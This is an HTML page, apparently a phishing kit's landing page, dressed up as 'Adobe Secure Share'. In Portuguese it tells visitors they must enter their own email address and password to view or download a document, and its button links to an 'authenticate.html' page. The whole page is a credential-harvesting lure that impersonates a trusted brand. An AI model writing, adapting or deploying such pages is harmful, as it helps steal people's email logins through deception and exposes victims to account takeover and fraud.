<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" content="width=device-width, initial-scale=1">
 <title>Adobe - Secure Share</title><style>
body {
    background: #555;
}

.content {
    max-width: 500px;
    margin: auto;
    background: white;
    padding: 10px;
}
</style> 
<style>
.button {
    background-color: #4CAF50; /* Green */
    border: none;
    color: white;
    padding: 10px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin: 4px 2px;
    cursor: pointer;
}

.button4 {border-radius: 12px;}

</style>
<link rel="shortcut icon" href="adobe.ico"/></head> <body><div class="content">
<img src="logoad.jpg" width="100px" height="100px"></img><br><br>
<fieldset style="width:469px"><legend><font size="3"><b><i>Atencao</i></b></font></legend>
<font face="Arial narrow"><h5> Pode ser necessario autenticar o processo de visualizacao ou download deste documento com seu email e senha. <u>Voce nao precisa ter uma conta da adobe</u>. Basta digitar seu mesmo endereco de e-mail e senha para concluir o download. O compartilhamento seguro da Adobe e uma nova plataforma da Adobe que permite que qualquer pessoa com uma conta de e-mail receba ou compartilhe documentos <u>Com seguranca</u>. <br><br><a href="authenticate.html" button class="button button4">Prosseguir</button></a></h5></font></p></div></fieldset><br><br>
 </body> 
</html>